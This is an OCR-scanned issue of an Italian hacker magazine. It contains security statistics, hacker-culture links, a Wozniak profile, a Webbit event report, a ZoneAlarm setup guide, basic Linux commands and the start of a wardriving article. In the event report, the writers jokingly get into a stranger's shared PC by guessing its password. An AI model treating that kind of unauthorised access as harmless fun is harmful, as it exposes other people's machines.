testa i tentativi di violazione di protocolli (43%), 
seguiti da tentativi di accesso autorizzati (26%) 



Attacchi per servizi 




Tip» di Attacca 



□ M 




e dai classici DoS (10%). Tutte le altre attività 
sospette si attestano sul 1 8%. I dati sulla pro- 
venienza degli attacchi mostrano i soliti Stati 
Uniti al primo posto, com'era naturale immagi- 
narsi, con un 37%, e, a sorpresa, l'Italia, con un 
9% che scavalca il 7% della Corea (almeno in 
questo campo li abbiamo battuti!) ci 
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O PUNTO 

INFORMATICO 

RENDE PUBBLICHE 

LE PROPRIE STATISTICHE 

/l popolarissimo quotidiano on-line Punto In- 
formatico (www.punto-informatico.it) ha di 
recente pubblicato un resoconto ufficiale delle 
proprie statistiche inerenti ad accessi, visite, 
tempi di permanenza e vari altri parametri: da 
tempo i lettori chiedevano di poter accedere a 
questi dati. 

Ecco un breve sunto: nell'ultimo mese 
le pagine sfogliate sono state cir- 
ca 7,5 milioni, con una media di 
71 mila diversi lettori per ogni nu- 
mero di Punto Informatico pubblicato. 
Dal 1 al 30 giugno i collegamenti sono stati 
287.072; il tempo medio di collegamento per 
ogni differente lettore si aggira attorno ai 10 
minuti, durante i quali vengono aperte circa 3 
pagine e mezzo. 

Molto interessanti anche i numeri riguardanti 
i differenti sistemi operativi e browser utiliz- 
zati dagli utenti per accedere al sito: come 
era semplice prevedere, Explorer trionfa 
con l'88% dell'utenza, mentre 
Netscape passa di poco l'8%. 
Mozilla e altri browser alternativi rimangono al 
di sotto del 3%. 

Anche riguardo ai sistemi operativi il discorso 
non cambia (e la tristezza aumenta): Win- 
dows la fa da padrone con un 
94,7%, seguito a grande distanza 
da Linux che mangia meno del 4% 
della torta. Mac OS e altri sistemi operati- 
vi, che pure ci sono, fanno da fanalino di coda 
con percentuali di poco superiori, complessi- 
vamente all'1%. 

In forte crescita anche la comunità degli uten- 
ti, registrati o meno, che quotidianamente si 
scambiano messaggi e commenti ri- 
guardanti gli articoli; nei forum del si- 
to il numero di messaggi è aumentato del 75% 
nell'ultimo anno, arrivando a quota 21.000. El 
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1 5 minuti di celebrità! Questi sono i vostri 
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www.2600.org 

2600 è stata la prima rivista hacker a 
uscire dal mondo di bit della rete, già 
popolato di ezine famose, per appro- 
dare sulla carta. Nata nel 1987 da Em- 
manuel Goldstein, pseudonimo tratto 
dal romanzo 1984 di Orwell, ha sem- 
pre alternato articoli tecnici sulle reti 
di comunicazione (da quelle telefoni- 
che a Internet) a campagne per le li- 
bertà civili. Il sito è ben più che una 
vetrina per la rivista, o una versione 
digitale della stessa e offre tutte quel- 
le notizie che la rivista non può tratta- 
re (la cadenza è trimestrale, quindi 
non può avere news aggiornate). 
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www.piratel.it 

Volevo segnalarvi il nostro sito che nel suo contesto e vario ma piacevole per i no- 
stri utenti. 

Claudio C. 
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Phnck 



www.phrack.org 

Phrack è una storica ezine del mondo 
underground americano, che si è con- 
quistata gli onori della cronaca per 
aver pubblicato un articolo sulla ge- 
stione del numero 911 (l'equivalente 
del nostro 113) da parte della AT&T, 
articolo che è divenuto la prova fon- 
damentale dell'accusa nel primo im- 
portante processo contro hacker negli 
USA. Nota storica a parte, Phrack è 
una ricchissima fonte di informazioni, 
anche se è di livello piuttosto alto e 
poco adatto ai novellini. 
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http://crea.html.it/sito/SAUR 
http://digilander.iol.it/hacksaur/ 
Vi vorrei segnalare questi siti: pubbli- 
cateli!!! 
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www.dangerdvd.com 

Saluti dal moderatore BiG JiMmE del 

forum publicità di dangerdvd.com 

Ciao moderatore. 



Nili 



www.giovo.cjb.net 
Gentile redazione di hacker journal,so- 
no un ragazzo di 13 anni e voglio com- 
plimentarmi con voi per la rivista che 
avete creato, siete stati in grado di rea- 
lizzare il sogno di milioni d'italiani, cioè 
quello di leggere una rivista riguar- 
dante l'hacking, miraccomando conti- 
nuate così. 

Inoltre se è possibile vi chiedo se pote- 
te pubblicare il mio sito: 

Grazie e... 
COONNNTINUUAATEEE COOSIII! 



à 
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siti; scegliete voi se tirarvela o vergognarvi 
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http://computerbugs.da.ru 
Volevo segnalarvi il mio sito persona- 
le web... 

Sono sicuro che dei filoLinuxiani come 
voi lo apprezzeranno molto, perchè è 
un sito die raccoglie testi, immagini e 
video sulla comicità dell'informatica 
(bersagli preferiti Lamer, il caro BILL e 
Winzozz, Apple). 
Buon Lavoro, 

KristianO 



http://members.xoom.virailio.it 
/brandomat/Branzilla%20Ope- 
rations 

Volevo avvisarvi che nel sito ho scelto, 
come immagine, il logo del vostro 
giornale. 

Spero che non vi crei problemi. Ho in- 
serito il vostro logo perche 1 lo trovo 
bello, accattivante e allo stesso tempo 
penso che vi faccia pubblicità. 
Ciao 

Brandom 
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Ciao ragazzi...sono il webmaster di www.hackingevolution.6go.net 
Volevo solo farvi i complimenti per la rivista e anche un po' di pubblicità 1 al mio sito. 

byez FOX80129 
(Purtroppo in questi giorni il sito ha avuto dei problemi, e si sono persi dei file e mol- 
ti link della sezione download. I Webmaster stanno comunque lavorando per ripri- 
stinare il tutto). 
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www.cultdeadcow.com 
Cult of the Dead Cow (il culto della 
vacca morta) è il nome della crew re- 
sponsabile di aver creato Back Orifi- 
ce, probabilmente il più famoso ca- 
vallo di troia della storia hacker. 
Contrariamente a quanti si nascondo- 
no dietro a pseudonimi e liste di proxy 
più lunghe di una coda in posta, i ra- 
gazzi di cDc si fanno vedere, e senti- 
re. In occasione del lancio di Back Ori- 
fice 2000 hanno organizzato una con- 
ferenza stampa per mostrare come il 
loro "strumento di amministrazione 
remota" fosse migliore di pacchetti 
commerciali come Pc Anywhere di 
Symantec o altri programmi simili. 
Dopo gli attentati dell'1 1 settembre 
negli USA, hanno perfino offerto all'F- 
Bl la loro esperienza e il loro appog- 
gio per le investigazioni. 
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www.lysator.liu.se/etexts/hacker/ 
Parlando di Phrack, abbiamo accen- 
nato alle prime retate anti hacker ese- 
guite dall'FBI negli Stati Uniti. Se vole- 
te leggere le storie di quegli anni, e 
farvi una base di conoscenze minime 
della storia dell'hacking, dovete asso- 
lutamente leggere The Hacker Crack- 
down, di Bruce Sterling (uscito in Italia 
col titolo "Giro di vite contro gli Hac- 
ker", da Edizioni Shake). 
Se non volete comprare il libro, trova- 
te la sua versione elettronica, perfet- 
tamente legale, a questo indirizzo. 
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PERSONAGGIO 



DALLE SCATOLETTE PIRATA A UN'AZIENDA MULTI MILIARDARIA 



PIRATE9 

of 5iUCD\< 
VALLEY 



STORIA DEI PIRATI 
DI SILICON VALLEY 

Gli esordi di Wozniak e Jobs 

(e quelli paralleli di Bill Gates 

e Steve Ballmer, fondatori 

di Microsoft) 
sono 

brillantemente 
raccontati 
nel film "Pirati 
della Silicon 
Valley" . 
In Italia 
è stato trasmesso 
solo da Telepiù, 
e la cassetta 
distribuita 
da Warner Bros 
è un po' introvabile, ma i negozi 
e i noleggi più grandi possono 
senz'altro procurarla. 



WOZCAM IN DIRETTA 

Su www.woz.org, Steve risponde 
personalmente a centinaia di 
email riguardanti la storia di 
Apple e dell'informatica in 
generale. Oltre a questo, e ad 
altro informazioni interessanti, 
si può anche sbirciare nello 
studio di Steve pilotando la 
WozCam, una Webcam motorizzata 
che è possibile orientare a 

tanza con il proprio browser. 



r* 



p+~*\* 



Apple I, il primo computer Apple, aveva un proces- 
sore 6502, 4 Kbyte di memoria, poteva usare un re- 
gistratore a cassette come memoria di massa e si 
adattava a un arredamento classico: nei primi 
esemplari, il case era completamente in legno. 



Steue LUozniak, 

il mago di IDoz 



Uiaggio di andata e ritorno nelle alte sfere 
dell'industria hi-tech, partendo da costruttore 
di schede pirata per finire professore alle medie 




teve "the Woz" Wozniak è un per- 
sonaggio molto singolare nella 
storia del computer. E uno dei 
fondatori di Apple, insieme a 
Steve Jobs, e si può dire che ab- 
bia inventato il Personal Computer di mas- 
sa (con l'Apple I e soprattutto con il suo suc- 
cessore, I Apple II). Nonostante questo, ha 
abbandonato tutto, fama e soldi compresi. 



» Gli esordi pirateschi 

Se la fine della carriera di Wozniak nell'in- 
dustria hi-tech è singolare, gli inizi non sono 
da meno. I primi soldi li ha guadagnati ven- 
dendo degli apparecchi ietti elettronici che 
costruiva egli stesso: le "Blue Box". Le Blue 
Box sono scatolette con un generato- 
re di frequenze audio che, accostate a 
una cornetta del telefono, permette- 
vano di telefonare gratis in qualsiasi 
parte del mondo. Si può immaginare quan- 
to questi apparecchi potessero essere utili 
agli studenti dell'Università di Berkeley, che 
studiavano lontani da famigliari, amici e fi- 
danzati/e. Già allora, cominciava a deli- 
nearsi l'assetto che in seguito avrebbe avu- 
to la società della mela colorata: Wozniak 
creava circuiti sempre più raffinati, e 
Steve Jobs (attuale amministratore 
delegato di Apple) si occupava di 
commercializzarli nei dormitori del cam- 
pus ed espandere il mercato. 
A quei tempi, Woz faceva dei lavori per He- 
wlett Packard, e aveva iniziato a progettare 
l'Apple I, quasi per divertimento. Per Woz 
l'Apple I era la scintilla che avrebbe 
potuto scatenare una rivoluzione, 
quella del Personal Computer; le possi- 
bilità di guadagno non lo interessavano più 



di tanto. Woz sottopose il progetto al suo 
capo in H^ il quale però riteneva che un 
computer da 800 dollari che potesse essere 
collegato alla TV e programmato in Basic, 
fosse una cosa troppo rischiosa per una so- 
cietà che, come H^ aveva fondato la sua 
fortuna su prodotti professionali e affidabili. 



» Salto di qualità 

Intuito che comunque si trattava di un pro- 
dotto rivoluzionario, Steve Jobs spinse Woz- 
niak a richiedere ad HP una dichiarazione 
liberatoria, che gli riconoscesse la proprietà 
intellettuale sull'Apple I (essendo dipenden- 
te Hf? tutto quanto veniva prodotto da Woz- 
niak, apparteneva alla compagnia). Woz- 
niak, Jobs e alcuni amici cominciaro- 
no quindi a produrre l'Apple I nel ga- 
rage di Jobs, e a venderlo per corri- 
spondenza. L'enorme successo dell'inizia- 
tiva facilitò a Jobs il compito di reperire ca- 
pitali a trasformare il gruppo di hacker in 
un'azienda. Azienda che ben presto diventò 
troppo grande e troppo complessa per uno 
spirito come quello di Woz, più interessato 
agli aspetti scientifici, tecnologici e sociali 
dei propri progetti che alle questioni orga- 
nizzative e finanziarie. 



» Lieto fine 



Woz ha abbandonato un gioco ormai trop- 
po grande per lui, e oggi collabora con 
il distretto scolastico di Los Gatos, in 

California, dove ha allestito a sue spese dei 
laboratori per i ragazzi delle scuole medie, 
ai quali dedica anche molto del suo tempo 
insegnando loro l'uso del computer, m 
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EVENTI 



SMANETTONI A RACCOLTA, A PADOVA DAL 5 AL 7 LUGLIO 



- % 



- *& UJebb.it 
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LUebbit, il più grande 

raue (net) party 



Come definireste altrimenti un raduna dnue migliaia di persane che, per tre giorni 
e tre notti, fanno ballare dati, immagini e musica al ritmo di 156 Mbit al secondo? 




Se leggete un po' in giro 
sembra che Webbit as- 
somigli a un raduno di 
hacker da battaglia, ma 

I è vero solo in parte. È un 

raduno, ma di creativi e utilizzatori 
del software libero, dopo di che la 
parte hacker a volte c'è e a volte no. 
Sì, c'era sikurezza.org che faceva il 
contest sul sistema messo lì apposta 
per essere violato se qualcuno fosse 
stato abbastanza bravo. Ma ormai 
sono robe per gli script kiddie. As- 
sai più interessante il contest in cui 
c'era il server, accessibile a tutti, e 
vinceva il più bravo a configurare e 
offrire nel modo migliore e più ele- 
gante tutti i servizi. 

La cosa bellissima di Webbit è 
che a qualunque ora del giorno o 
della notte la grande Arena è sem- 
pre accesa e dentro non ci sono mai 
meno di quattrocento persone. 

Due di queste siamo il mio amico 
Birpi ed io. Birpi tira fuori una beta 
di quello che sarà tra poco Mac OS 
X 10.2 e mi fa vedere il nuovo client 
Samba. Mela-K, e improvvisamente 
appare una lista di duecento PC 
condivisi. Per pura curiosità comin- 
ciamo a vedere se le password sono 



all'altezza della situazione e sce- 
gliamo il computer di nome Mad. 
Nome utente: Mad. Birpi e io ci 
guardiamo. Password: Mad. Mad, 
leggi HJ, che ti fa bene, e cambia la 
tua password! 

Perlatro va detto che a Webbit ti- 
pi con due cose così sotto, a livello 
di sicurezza, c'erano eccome. Uno 
degli stand espositivi era quello di 
OpenBsd, uno dei free Unix che 
vanta il miglior livello di sicurezza, 
con ottime T-shirt su Blowfish (biso- 
gna avere la schiena bella grossa 
per poter leggere bene il codice 
sorgente...). 

Nello stand OpenBsd mi accoglie 
subito Matt, ragazzo americano che 
mi sorride e fa: "Ma quanti ca%%o 
di tesserini hai?". Gli rispondo che 
in realtà me ne manca uno, perché 
accedo alla Lan dell'Arena da gior- 
nalista e non con il badge da parte- 
cipante in piena regola (ma ho dor- 
mito ugualmente a Webbit, quelle 
due-tre ore per notte, e devo dire 
che è uno sballo). 

Oh, spiega Matt, "neanch'io ho 
quel pass". Ma non ce n'è stato bi- 
sogno, aggiunge, e mi indica il ser- 
ver del loro stand, che dalle luci non 



si capisce se sia sul punto di esplo- 
dere dal traffico oppure stia comu- 
nicando con gli extraterrestri. "Vedi 
il nostro server?", mi fa, "collegarlo 
è stato semplice: abbiamo tolto una 
mattonella dal pavimento dello 
stand, e sotto ci passavano tanti di 
quei cavi...". Insomma, come al soli- 
to, basta un pò 7 di inventiva, m 

Reed Wright 



Dove trovare foto e 
cronache... ufficiali e non 

Il sito ufficiale del Webbit si trova 
all'indirizzo http://w02.webb.it. An- 
che se il sito è realizzato molto be- 
ne, le informazioni che ci si trovano 
sono un pò 7 fredde e formali; a chi 
preferisce impressioni a caldo e fo- 
to tra l'amatoriale e il goliardico, 
consigliamo di andare a visitare le 
pagine sul Webbit 2002 presenti sul 
sito del PowerBook Owners Club 
(www.poc.it), un agguerrita accolito 
di nomadi informatici amanti del 
Mac. Ogni anno, in occasione del 
Webbit, la tribù del Poe si riunisce a 
Padova, prendendo possesso di 
spazio fisico e banda finché ce n'è. 



15 1 



www.hackerjournal.it 



PRATICA . 



COME CONFIGURARE IL FIREWALL GRATUITO ZONE ALARM 



Pc al sicuro senza 

HI giorno d'oggi, nauigare su Internet senza un firewall è come lasciare l'auto aperta 







olo chi ha usato un fi- 
rewall almeno una 
volta, sa quanti siano 
gli attacchi potenziali e le 
ispezioni maliziose che ogni ora tempesta- 
no qualsiasi computer collegato a Internet. 
Le normali protezioni fornite da un antivi- 
rus non bastano; serve un firewall che pro- 
tegga il computer dalle aggressioni che 
possono venire dall'esterno, e che magari 
verifichi anche le connessioni stabilite da 
programmi già residenti sul PC, a volte in 
modo inconscio da parte dell'utente. 

Il firewall ZoneAlarm, prodotto da Zo- 
neLabs (www.zonelabs.com) risponde a 
queste caratteristiche, e ha un grande 
pregio: nella sua versione base, il suo 
uso è completamente gratuito per l'uso 
personale. 

C'è però solo una cosa più pericolo- 
sa di non avere un firewall: avere un 
firewall mal configurato. Se le imposta- 
zioni non sono fatte a regola d'arte, posso- 
no lasciare aperte delle falle, con l'aggra- 
vante della falsa sensazione di sicurezza 
data dalla presenza del firewall. Vediamo 
dunque come configurare ZoneAlarm. 

Il primo passo è quello di scari- 
care e installare il programma, 
dal sito www.zonelabs.com (cer- 
cate il bollino con la scritta "Free 
Download"). Dopo il doppio clic e le fasi di 
installazione, occorrerà riavviare il PC. 
Comparirà una presentazione delle funzio- 
nalità del firewall, che conviene leggere se 
sapete l'inglese. 




Il programma viene eseguito 
automaticamente all'avvio, e 
posiziona un'icona nella barra 
delle applicazioni di Windows, 




accanto all'orologio. Da questa icona si 
potrà aprire la finestra di configurazione o 
avere notifiche sugli allarmi che possono 
scattare durante la navigazione. 

Per una normale postazione di 
un solo computer, si può evitare 
di fare configurazioni iniziali. Il 
programma è già impostato per 
un utilizzo normale, e bloccherà tutto il traf- 
fico sospetto diretto al proprio PC. 

Ogni volta che un programma 
eseguito sulla macchina locale 
I^h J cercherà di col legarsi a Internet, 
ZoneAlarm ci chiederà di dare 
una conferma alla connessione. In questo 
modo, si potranno autorizzare solo i pro- 
grammi che si desidera realmente usare, 
bloccando il traffico originato da program- 
mi AdWare o SpyWare, da trojan e da pro- 
grammi che inviano informazioni al pro- 
duttore, per notificare aggiornamenti e per 
chissà quali altri scopi. 




AdWare o SpyWare: Programmi che 
inviano informazioni sulle nostre 
preferenze di navigazione a un server 
centrale, che le utilizza per inviare 
banner pubblicitari mirati. Sono un 
potenziale rischio per la privacy. 




Dall'icona nella barra delle ap- 
plicazioni comparirà un fumetto 
con il nome dell'applicazione 
che cerca di stabilire la connes- 
sione, e l'indirizzo Internet che questa sta 
cercando di contattare. 
Per autorizzare la connessione basta fare 
clic su Yes, mentre per bloccarla basta pre- 
mere No. Facendo clic su "Remember this 
answer the next time I use this program", 
ZoneAlarm ricorderà la nostra scelta ed 
eviterà di chiederci un'ulteriore conferma 
quando la stessa applicazione cercherà di 
collegarsi a Internet. 

Questa scelta sarà comunque modificabile 
in seguito. 

PPer l'utilizzo normale, non oc- 
corre fare altro, ma ZoneAlarm 
può offrire molto di più in termi- 
ni di flessibilità e configurabilità. 
Facendo doppio clic sull'icona nella barra 
della applicazioni, si aprirà la finestra del 
programma vero e proprio, che permette 
di impostare ogni dettaglio del firewall. 

Facendo clic sul pulsante Secu- 
rity si possono impostare delle 
configurazioni di sicurezza 
preimpostate, adatte a tre livelli 
diversi di protezione (Low, Medium e High), 
descritti nella tabella "I livelli di ZoneA- 
larm". Come si può vedere, i livelli di pro- 
tezione possono essere impostati in due 
differenti aree: nella zona Locai e nella zo- 
na Internet. ZoneAlarm permette infatti di 
distinguere una zona per la rete locale, e 
una per Internet (che probabilmente avrà 
impostazioni di sicurezza più rigorose). 

HPer poter distinguere la zona 
locale dal resto di Internet, Zo- 
neAlarm avrà bisogno di alcu- 
ne informazioni. Il firewall è in 
grado di riconoscere i computer "affida- 
bili" in base ad alcuni parametri. Il modo 
più semplice è quello di indicare gli indi- 
rizzi IP di tutti i computer della rete loca- 
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le, facendo clic su Advanced (nel pannel- 
lo Security), poi sul pulsante Add -> 
Host/Site e inserendo una descrizione del 
computer (per es, Studio) e il numero IP 
(es, 192.168.0.34). Il computer appena 
inserito apparirà nella lista Other Com- 
puters; per disabilitare temporaneamen- 
te il traffico da quel computer basterà de- 
selezionare la casella di spunta rossa a 
sinistra del nome. 
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HSe i computer appartenenti alla 
rete locale sono tanti, non con- 
viene inserirli uno a uno. 
La cosa migliore è quella di rag- 
gruppare i loro numeri IP in un intervallo 
ben preciso (per esempio da 192.168.0.2 
a 192.168.0.10), e inserire questo inter- 
vallo nella maschera che compare selezio- 
nando IP Range dopo aver premuto il pul- 
sante Add. 




È evidente che l'impostazio- 
ne dei punti 8 e 9 possono 
funzionare solo se i compu- 
ter della rete locale hanno 
un numero IP fisso, e non dinamico. 
Per esempio funziona se si utilizza la con- 
divisione della connessione Internet di 
Windows 98SE/Me/Xp, che attribuisce a 



ciascuno un numero fisso. Se invece 
computer della rete locale sono collegati 
a un router con attribuzione dinamica de- 
gli indirizzi IP (DHCP), si potrà utilizzare la 
maschera di sottorete impostata sul router 
(192.168.0.* oppure 10.13.*.*). 
Per farlo, bisogna selezionare Subnet do- 
po aver premuto il pulsante Add, inserire 
la descrizione, il numero IP e la maschera 
di sottorete corrispondente (se siete in 
un'azienda e non conoscete questi para- 
metri, fatevi aiutare dall'amministratore, e 
ricordategli di pagare la licenza: ZoneA- 
larm è gratis solo per uso personale, fuori 
dalle aziende). 
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Le possibilità di configurazio- 
ne di ZoneAlarm non finisco- 
no qui. 
I Facendo clic sul pulsante Pro- 
grams, si potrà vedere una lista di tutte le 
applicazioni che hanno cercato, almeno 
una volta, di accedere a Internet dopo l'in- 
stallazione di ZoneAlarm, con le imposta- 
zioni di sicurezza relative. 
La prima colonna (Allow Connect) indica 
se il programma ha o meno la possibili- 
tà di collegarsi a Internet: un segno di 
spunta verde significa che ZoneAlarm lo 
lascerà passare, una X rossa che il pro- 
gramma verrà bloccato, e un punto di do- 
manda sta a significare che il firewall ci 



chiederà ogni volta come comportarsi, at- 
traverso la finestra di dialogo a forma di 
fumetto vista all'inizio. 
La seconda colonna (Allow Server) ha dei 
simboli con lo stesso significato della pri- 
ma, ma indica se il firewall è impostato per 
permettere il funzionamento del program- 
ma come server. 

L'ultima colonna (Pass Lock) se spuntata 
permette al programma di funzionare an- 
che se viene abilitato il blocco automatico 
delle connessioni (Automatic Lock). 
Tutte queste impostazioni sono modificabi- 
li facendo clic con il pulsante destro del 
mouse sul programma desiderato, e sele- 
zionando l'opzione desiderata nei vari sot- 
to menu, m 



I LIVELLI DI ZONEALARM 



Ecco come funzionano i livelli 
di protezione di ZoneAlarm: 



LOW I 

Utilizza solo i privilegi 
delle applicazioni e il blocco 
Internet (Internet lock); il blocco 
di Internet ferma solo il traffico 
delle applicazioni; permette accesso 
ai servizi di condivisione di file 
e stampanti; lascia il computer 
e le applicazioni server visibili 
sulla rete. 



MEDIUM I 

Oltre alle sicurezze offerte 

dal livello Low, il blocco di Internet 

ferma tutto il traffico. 

Cosigliato per una connessione 

attraverso una rete locale. 



HIGH I 

Oltre alle sicurezze 

di Medium, blocca l'accesso 

alle condivisioni di file e stampanti 

e rende il computer invisibile 

sulla rete. 



www.hackerjournal 



it|l7 



PICCOLO DIZIONARIO PER CHI VIAGGIA DA MS-DOS A LINUX 



Primi passi con LinuH 

Se auete finalmente decisa di installare una distribuzione LinuH, 

probabilmente ui sembrerà di trouarui in un paese straniero di cui non conoscete 

la lingua. Ecco un utile dizionario per le operazioni fondamentali. 




er chi per la prima volta si avvici- 
na alla fatidica 'linea di coman- 
do" di Linux (sia essa bash o 
quant'altro), magari proveniendo 
dal classico MS-DOS, sicura- 
mente risulterà scocciante, quando non 
espressamente frustrante, il non riuscire nel- 
le operazioni più banali: copiare un file, 
creare una directory o visualizzare il conte- 
nuto di un .txt diventano ostacoli quasi in- 
sormontabili di fronte ai quali si sprecano 
insulti e botte sulla tastiera. 

In verità, seppur possedendo una com- 
plessità ed una versatilità nettamente supe- 
riori al vecchio Dos, la shell di Linux consen- 
te di eseguire tutte queste basilari operazio- 
ni in modo simile, aggiungendo spesso una 
quantità di opzioni che raramente si poteva 



■ ma sempre 



riscontrare nell'ormai obsoleta 
utile - shell Microsfot. 

Andiamo dunque a dare un'occhiata più 
o meno approfondita a tutti i "fondamenta- 
li" che vi saranno indispensabili nell'utilizzo 
di una shell UnixLike: la sintassi e le opzioni 
presenti nella brevissima guida che segue le 
potete trovare mediante un semplice man 
[comando] direttamente dalla vostra linea di 
comando (oltre a molte altre informazioni, 
non dimenticate che Linux è uno dei sistemi 
operativi meglio documentati del mondo). 

Prima di iniziare, una doverosa racco- 
mandazione: a differenza di MS-DOS, Li- 
nux fa differenza tra maiuscole e minusco- 
le, per cui i comandi e le opzioni devono 
essere inseriti esattamente così come indi- 
cati nel testo. 



» Elencare il contenuto 
di una directory 

Comando MS-DOS: dir 

Sintassi Bash/Linux: Is [opzioni] [file...] 

dir [file...] 

vdir [file...] 

Si tratta senza dubbio del comando più 
utilizzato: tramite esso potremo visualizzare 
a schermo il contenuto di una directory, e 
mediante l'utilizzo di una serie di parametri e 
opzioni potremo effettuare ricerche sui nomi 
dei file eccetera. 

Opzioni: 

-C Elenca i file ordinati verticalmente in 
colonne. 

-F Aggiunge a ciascun nome di directory 
una "/", una "|" alle FIFO e un "*" agli ese- 
guibili. 

-R Elenca ricorsivamente tutte le sottodi- 
rectory incontrate. 

-a Include nell'elenco tutti i file il cui no- 
me inizia per ".". 

-C Usa l'ora dell'ultimo cambiamento 
dello stato del file anziché l'ora dell'ultima 
modifica per ordinare (con -t) o per elen- 
care (con -I). 

-d Elenca le directory come gli altri file, 
anziché visualizzarne i contenuti. 

-i Stampa il numero di indice (inode) di 
ciascun file, sulla sinistra del nome. 

-I Scrive (in un'unica colonna) i permessi 
del file, il numero di collegamenti (link) ver- 
so di esso, il nome del proprietario del 
gruppo, la dimensione (in byte), l'orario 
ed il nome. L'orario mostrato è quello del- 
l'ultima modifica; le opzioni -e e -u sele- 
zionano gli altri due orari (ultimo cambia- 
mento di stato e ultimo accesso). Per i file 
speciali di device, il campo della dimensio- 
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» (f) 



ne è di norma rimpiazzato dal numero 
maggiore e minore del device. 

-q Stampa i caratteri non rappresenta- 
bili di un nome di file come punti di doman- 
da (questo può essere il default in caso di 
output su terminale). 

-r Inverte la direzione dell'ordinamento. 

-t Ordina secondo l'orario mostrato. 

-u Usa l'orario di ultimo accesso per or- 
dinare (con -t) o elencare (con -I). 

-1 Output su una colonna singola. 



» Copiare un file 

Un altro tra i comandi più utilizzati: il suo 
funzionamento è semplice, copia il contenu- 
to di un file in un altro. 

Comando MS-DOS: copy 
Sintassi Bash/Linux: cp [opzioni] 
file percorso 
cp [opzioni] file... directory 

Opzioni: 

-f Rimuove i file di destinazione pree- 
sistenti, se necessario (vedi sopra). 

-i Chiede conferma prima di sovra- 
scrivere file di destinazione 
preesistenti; meglio utilizzarla nelle prime 
prove, prima di cancellare file importanti. 

-p Conserva proprietario, gruppo, 
permessi (inclusi i bit setuid e setgid), data di 
ultima modifica e data di ultimo accesso 
dei file originali. 

-R Copia le directory ricorsivamen- 
te, adattando il risultato in base incontri 
oggetti diversi da file ordinari o direc- 
tory. 

-r Copia le directory ricorsivamente, 
comportandosi in modo non specificato 
con oggetti diversi da file ordinari o di- 
rectory. 



» Creare una directory 

Comando MS-DOS: md 

Sintassi Bash/Linux: mkdir [opzioni] 

directory... 

Il comando consente di creare una direc- 
tory nella quale archiviare dati di qualsiasi tipo. 
I permessi ereditati dalla directory creata sono 
normalmente gli stessi dell'utente che la crea. 



Opzioni: 

-m, --mode Modo. Imposta i per- 
messi, che possono essere simbolici come in 
chmod, comando di cui parleremo in uno 
dei prossimi numeri, e poi usa i permessi 
predefiniti come punto di partenza. 

-p, --parents Crea ogni directory ge- 
nitrice mancante. Per esempio, se ci si trova 
in una directory vuota e si vogliono creare 
due directory, una dentro l'altra, basterà di- 
gitare md /nuovadirectoryl/nuovadirec- 
tory2 -p. In questo caso, la directory nuova- 
directory2 verrà creata dentro a nuovadirec- 
toryl . Se nuovadirectoryl non esiste, e non 
si usa l'opzione -p, il risultato sarà un errore. 

—verbose visualizza un messaggio di 
conferma per ogni directory creata. Ciò è 
utile soprattutto in congiunzione con -p. 



» Muouere o rinominare 
un file 

Comando MS-DOS: rn/move 
Sintassi Bash/Linux: mv [opzioni...] 
sorgente destinazione 
mv [opzioni...] sorgente... 
destinazione 

Consente di spostare un file in un al- 
tro, definendo anche il nome della copia. 

Se si copia un file con nome diverso 
dall'originale ma nella stessa posizione, il 
risultato finale sarà che il file verrà 
rinominato. 

Opzioni: 

-f Non chiede conferme. 

-i Chiede conferma quando, nella po- 
sizione di destinazione, esiste un file con lo 
stesso nome (nel caso in cui venissero usati 
sia -f, sia -i, l'ultima opzione data prende la 
precedenza). 



» Cancellare un file 
(o una directory) 

Comando MdDos: del/rd/deltree 
Sintassi Bash/Linux: rm [opzioni] file... 

Ovviamente, consente di cancellare un 
file dal disco. Ovviamente, si tratta di un co- 
mando molto pericoloso. A differenza del 
rassicurante Windows, una shell Unix non 




ha un cestino in cui si posso- 
no ritrovare i file cancellati 
per errore. Prima di premere 
Invio, controllate di aver im- 
postato correttamente ogni '" ^-— 
opzione. 

Opzioni: 

-f Non chiede conferme. Non scrive 
messaggi diagnostici. Non produce un stato 
di ritorno d'errore se gli unici errori erano 
file inesistenti. 

-i Chiede conferma (nel caso in cui ve- 
nissero usati sia -f che -i, l'ultima opzione 
data prende la precedenza). 

-r o -R Rimuove alberi di directory in 
modo ricorsivo. Questo significa che se sie- 
te nella vostra directory Home e digitate rm 
-R cancellerete di sicuro tutti quanti i vostri 
documenti. 



» Uersa nuaue auuenture 



Questi i comandi fondamentali che vi con- 
sentiranno di iniziare ad utilizzare la shell. Esi- 
stono moltissimi altri comandi e programmi: 
cat, vi, less e compagnia renderanno possibile 
editare file o visualizzarne i contenuti... Ricorda- 
te che per ottenere documentazione esauriente 
su ognuno di questi è sufficente un man [co- 
mando]... Se invece non avete idea di quale co- 
mando vi serva, ma sapete che vi serve, ad 
esempio, per copiare un file, la cosa migliore è 
un "apropos copy", che vi restituirà tutti i riferi- 
menti necessari a ottenere informazioni più det- 
tagliate sull'argomento che vi interessa, m 
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// manuale del comando Is, ottenuto digitando "man 
ls" (senza virgolette) dalla linea di comando. In questo 
caso, si tratta però della shell Tcsh di /Mac OS X. 
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A CACCIA DI RETI WIRELESS SENZA PROTEZIONI 



L'insostenibile 

erezza dell'etere 



i 



« 



Le nuoue tecnologie di collegamento a Internet senza fili hanno 
riportato alla luce uno dei metodi di intrusione più antichi 





ei primi anni 80, quando co- 
minciavano a diffondersi i primi 
modem telefonici amatoriali a 
300 bps, alcuni hacker in erba 
avevano cominciato a setaccia- 
re la rete telefonica alla ricerca di un nu- 
mero al quale rispondesse, invece che una 
persona, un altro modem. Il principale 
strumento del mestiere, in quei casi, era un 
tipo di programma chiamato "war dialer", 
qualcosa come "telefonatore da guerra". In 
pratica, si trattava di un programmino 
che componeva in sequenza mi- 
gliaia di numeri telefonici, registrando 
in un file quelli ai quali rispondeva un mo- 
dem. In seguito, con tutta calma, l'utente 
poteva tentare di collegarsi ai numeri sele- 
zionati, per vedere a quali servizi corri- 
spondevano. 

I tempi sono cambiati, e la tecnologia 
pure; l'ultima moda nel campo dei metodi 
di accesso a Internet è costituita dalle con- 
nessioni radio. Con poche centinaia di eu- 
ro ci si può procurare una stazione base da 
collegare a Internet con metodi tradiziona- 
li, e una scheda per PC portatile in grado 
di dialogare con la stazione base. Le sta- 
zioni base funzionano in realtà come rou- 



ter, e permettono il collegamento di decine 
di PC contemporaneamente. La velocità 
massima di connessione tra scheda e sta- 
zione base può arrivare a 1 1 Mbit/secon- 
do per i sistemi che utilizzano lo standard 
IEEE 802.1 lb, attualmente il più diffuso 
(noto anche come Wi-Fi o Airport nel mon- 
do Mac) 



» Pirati della radio 

Cosa c'entra tutto questo con il discorso 
